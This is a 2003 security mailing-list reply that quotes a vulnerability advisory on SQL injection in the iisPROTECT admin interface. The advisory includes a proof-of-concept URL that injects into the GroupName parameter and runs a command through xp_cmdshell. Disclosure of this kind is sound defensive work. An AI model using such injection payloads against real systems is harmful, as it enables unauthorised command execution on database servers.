[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <1053704379.13361.0.camel@zack.spectrumconsulting.net>
Date: 23 May 2003 08:39:39 -0700
From: "C. David Wilde" <cdw@...inuxguy.com>
To: bugtraq@...security.net
Cc: Gyrniff <frohn@...erbruger.dk>, bugtraq@...urityfocus.com,
full-disclosure@...ts.netsys.com
Subject: Re: iisPROTECT SQL injection in admin interface
Don't you mean iIrony?
On Fri, 2003-05-23 at 06:09, bugtraq@...security.net wrote:
> Between this and iDefense's advisory I think we could give this product the
> 'Irony of the year award'.
>
>
> >
> > Release Date: 23.05.2003
> > Application: iisPROTECT v/2.2-r4 (and probably earlier versions)
> > Vendor: iisPROTECT
> > #536, 425 Carrall St.
> > Vancouver, BC,
> > V6B6E3, Canada
> > http://www.iisprotect.com/
> > Category: SQL injection in admin interface
> > Risk: Medium-High
> > Impact: Arbitrary command execution
> > Vendor Status: First notified 15/04-2003 17:36 (+1)
> > Fixed 15/04-2003 22:47 (+1)
> > Author: Torben 'Gyrniff' Frohn
> > email: nn@...niff.dk
> >
> > Intro
> > ====
> > >From vendor site: "iisPROTECT is a high performance user authentication,
> > password protection and member system".
> > iisPROTECT has a webbased admin interface, the interface lacks sanitising on
> > almost every variable. Successfully exploited some of the variables can be
> > used to inject and execute SQL statements.
> > iisPROTECT uses either a MS access file or a MS SQL-server. In the testing
> > environment the MS SQL-server solution is chosen.
> >
> >
> > Exploit (Proof of Concept)
> > ===================
> > The following URL exploits the "GroupName" variable and uses the stored
> > procedure "xp_cmdshell" to execute the command "ping":
> > http://x.x.x.x/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20master..xp_cmdshell'ping%2010.10.10.11';--
> >
> > Fix
> > ===
> > Vendor has fixed this problem.
> >
> > Credits
> > =====
> > Vulnerability found by Torben Frohn (Gyrniff)
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists